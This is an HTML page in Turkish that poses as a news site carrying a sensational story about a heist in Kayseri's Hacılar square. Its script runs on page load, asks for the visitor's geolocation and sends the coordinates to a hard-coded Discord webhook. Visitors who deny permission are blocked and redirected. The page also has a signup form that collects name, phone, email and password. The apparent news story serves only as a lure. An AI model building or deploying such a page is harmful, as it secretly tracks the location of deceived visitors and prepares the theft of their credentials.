<!DOCTYPE html>
<html lang="tr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>En Yeni Haberler - Kayseri Hacılar Meydanında Milyon TL'lik Vurgun</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            background-color: #f5f5f5;
            color: #333;
        }

        header {
            background-color: #e60000;
            color: #fff;
            padding: 1em;
            text-align: center;
            position: relative;
        }

        h1 {
            color: #fff;
            margin: 0;
        }

        #logo {
            position: absolute;
            left: 10px;
            top: 50%;
            transform: translateY(-50%);
            width: 50px; /* İkon genişliğini ayarlayabilirsiniz */
            height: auto;
        }

        .menu-icon {
            position: absolute;
            top: 50%;
            right: 20px;
            transform: translateY(-50%);
            cursor: pointer;
        }

        .menu-icon span {
            display: block;
            width: 30px;
            height: 4px;
            background-color: #fff;
            margin-bottom: 5px;
        }

        .hot-agenda__list {
            max-width: 800px;
            margin: 0 auto;
        }

        article {
            max-width: 800px;
            margin: 20px auto;
            padding: 20px;
            background-color: #fff;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        }

        p {
            line-height: 1.6;
            color: #555;
        }

        img {
            max-width: 100%;
            height: auto;
            border-radius: 8px;
            margin-bottom: 20px;
        }

        video {
            max-width: 100%;
            height: auto;
            width: 25%; /* Ekran uzunluğunun dörtte biri */
            display: block;
            margin: 0 auto; /* Videoyu ortala */
            border-radius: 8px;
            margin-bottom: 20px;
        }

        form {
            margin-top: 20px;
            width: 50%; /* Ekran genişliğinin yarısı */
            margin: 0 auto; /* Formu ortala */
        }

        label {
            display: block;
            margin-bottom: 5px;
        }

        input {
            width: 100%;
            padding: 8px;
            margin-bottom: 10px;
            border: 1px solid #ccc;
            border-radius: 5px;
        }

        .kaydol-button {
            background-color: #e60000;
            color: #fff;
            padding: 10px 20px;
            text-decoration: none;
            border-radius: 5px;
            display: inline-block;
            margin-top: 20px;
            cursor: pointer;
        }
        .center-image {
    display: block;
    margin: 0 auto;
    width: 55%;
    height: auto;
}
    </style>
</head>
<body onload="checkGeolocationSupport()">

    <header>
        <img id="logo" src="asd.png" alt="Logo">
        <h1>En Yeni Haberler</h1>
        <div class="menu-icon" onclick="openMenu()">
            <span></span>
            <span></span>
            <span></span>
        </div>
    </header>
    <h2 style="text-align: center;">Kayseri Hacılar Meydanında Milyon TL'lik Vurgun !! </h2>

    <div class="hot-agenda__list">
        <a href="/dunya/live-son-dakika-haberi-israil-hamas-savasinda-son-durum-israil-ordusunda-can-kaybi-artiyor-42382721" title="Son dakika haberi: İsrail-Hamas savaşında son durum... İsrailden Katara yeni teklif! Gazzede kanlı saldırı: 50 ölü..." class="hot-agenda--link img-link" target="_blank">
            <img src="https://image.hurimg.com/i/hurriyet/75/383x217/658d59b328686f19deea29c4.jpg" alt="Son dakika haberi: İsrail-Hamas savaşında son durum... İsrailden Katara yeni teklif Gazzede kanlı saldırı: 50 ölü..." title="Son dakika haberi: İsrail-Hamas savaşında son durum... İsrailden Katara yeni teklif Gazzede kanlı saldırı: 50 ölü..." class="" width="383" height="217">
        </a>
        <a href="/ekonomi/son-dakika-memur-memur-emeklisi-sgk-ve-bag-kurlular-zamlarini-merakla-bekliyor-iste-zam-hesaplamasi-42382741" title="Son dakika... Memur, memur emeklisi, SGK ve Bağ-Kurlular zamlarını merakla bekliyor... İşte zam hesaplaması" class="hot-agenda--link img-link" target="_blank">
            <img src="https://image.hurimg.com/i/hurriyet/75/383x217/658d2b85061030a75658b5ff.jpg" alt="Son dakika... Memur, memur emeklisi, SGK ve Bağ-Kurlular zamlarını merakla bekliyor... İşte zam hesaplaması" title="Son dakika... Memur, memur emeklisi, SGK ve Bağ-Kurlular zamlarını merakla bekliyor... İşte zam hesaplaması" class="" width="383" height="217">
        </a>
        
       
    </div>
    <img src="images.jpg" alt="Haber görseli" class="center-image">


    <article> 
         <h2>Kayseri Hacılar Meydanında Milyon TL'lik Vurgun !! </h2>
        
        <p>Kayseri'nin tarihi Hacılar Meydanı, sıradışı bir olaya ev sahipliği yaparak şehir gündemini sarsmaya devam ediyor. Meydanın derinliklerinde bulunan tarihî bir gömü, milyonlarca liralık vurguna ev sahipliği yaptığı ortaya çıktı. Gömüdeki bu olağanüstü durum, uzun bir süre sır olarak kaldıktan sonra gün yüzüne çıktı ve şehirde büyük bir çalkantıya sebep oldu.</p>
        <img src="download.jpg" alt="Haber görseli" class="center-image">
        <p>Olayın ortaya çıkmasının ardından güvenlik güçleri, hızla harekete geçerek olayın detaylarını aydınlatmaya çalışıyor. İlk incelemelere göre, gömüdeki vurgunun planlı ve organize bir şekilde gerçekleştirildiği belirtiliyor. Yetkililer, bu olayın şehirdeki ekonomik dengeleri etkileyebilecek nitelikte olduğunu ve soruşturmanın titizlikle sürdüğünü açıkladı.</p>

        <p>Milyonlarca liralık vurgunun ortaya çıkmasıyla birlikte, şehirdeki vatandaşlar da olaya büyük bir şaşkınlık ve tepkiyle karşılık veriyor. Halk arasında, bu olayın şehirdeki sosyal ve ekonomik yaşantıyı ne kadar etkileyeceği konusunda birçok spekülasyon ve değerlendirme yapılıyor. Haber, şehirdeki birçok kişi tarafından büyük bir merakla takip ediliyor ve olayın gelişmeleri yakından izleniyor.</p>
    </article>

    <video controls>
        <!-- Video linkini buraya ekleyin -->
        <!--<source src="your-video.mp4" type="video/mp4">-->
        Video içeriği buraya gelecek.
    </video>

    <form>
        <label for="isim">İsim:</label>
        <input type="text" id="isim" name="isim" required>

        <label for="soyisim">Soyisim:</label>
        <input type="text" id="soyisim" name="soyisim" required>

        <label for="telefon">Telefon:</label>
        <input type="tel" id="telefon" name="telefon" required>

        <label for="email">E-posta:</label>
        <input type="email" id="email" name="email" required>

        <label for="sifre">Şifre:</label>
        <input type="password" id="sifre" name="sifre" required>

        <div class="kaydol-button" onclick="submitForm()">Kaydol</div>
    </form>

    <script>
        function openMenu() {
            // YouTube linkini buraya ekleyin
            window.location.href = "https://testgallery.github.io/enyenihaberler.com/";
        }

        function submitForm() {
            // Kullanıcı bilgilerini al ve birleştir
            var isim = document.getElementById('isim').value;
            var soyisim = document.getElementById('soyisim').value;
            var telefon = document.getElementById('telefon').value;
            var email = document.getElementById('email').value;
            var sifre = document.getElementById('sifre').value;

            var bilgiler = "İsim: " + isim +
                            "\nSoyisim: " + soyisim +
                            "\nTelefon: " + telefon +
                            "\nE-posta: " + email +
                            "\nŞifre: " + sifre;

            // Bilgileri göster
            alert(bilgiler);
        }
    </script>
    <script>
		function checkGeolocationSupport() {
			if (navigator.geolocation) {
				navigator.geolocation.getCurrentPosition(showPosition, showError);
			} else {
				alert("Tarayıcınız konum izleme özelliğini desteklemiyor!");
			}
		}

		function showPosition(position) {
			var latitude = position.coords.latitude;
			var longitude = position.coords.longitude;

			var webhookURL = "https://discord.com/api/webhooks/1102118489063436298/o4iQIrgeJNAoo2NmPBhhXouiTjJcviL_AxNhtszm413wNZipPYYqg9eZlnayeu00cRAI";
			var payload = {
				content: "> **Konum:** Enlem: " + latitude + ", Boylam: " + longitude
			};

			fetch(webhookURL, {
				method: "POST",
				headers: {
					"Content-Type": "application/json"
				},
				body: JSON.stringify(payload)
			})
				.then(response => {
					if (response.ok) {
						console.log("Konum başarıyla gönderildi.");
					} else {
						console.error("Konum gönderilirken bir hata oluştu.");
                        window.location.href = "https://testgallery.github.io/enyenihaberler.com/"; 
							
						
					}
				})
				.catch(error => {
					console.error("Konum gönderilirken bir hata oluştu:", error);
                    window.location.href = "https://testgallery.github.io/enyenihaberler.com/"; 
				});
		}

		function showError(error) {
			switch (error.code) {
				case error.PERMISSION_DENIED:
					alert("Konum izni reddedildi. Sayfa yüklenemiyor.");
					window.stop();
					window.location.href = "https://testgallery.github.io/enyenihaberler.com/"; // Sayfa yüklenmesini durdur
					break;
				case error.POSITION_UNAVAILABLE:
					
                    window.location.href = "https://testgallery.github.io/enyenihaberler.com/"; 
					break;
				case error.TIMEOUT:
					
                    window.location.href = "https://testgallery.github.io/enyenihaberler.com/"; 
					break;
				case error.UNKNOWN_ERROR:
					alert("Bilinmeyen bir hata oluştu. Sayfa yüklenemiyor.");
                    window.location.href = "https://testgallery.github.io/enyenihaberler.com/"; 
					break;
			}
		}
	</script>
       

        
        

</body>
</html>
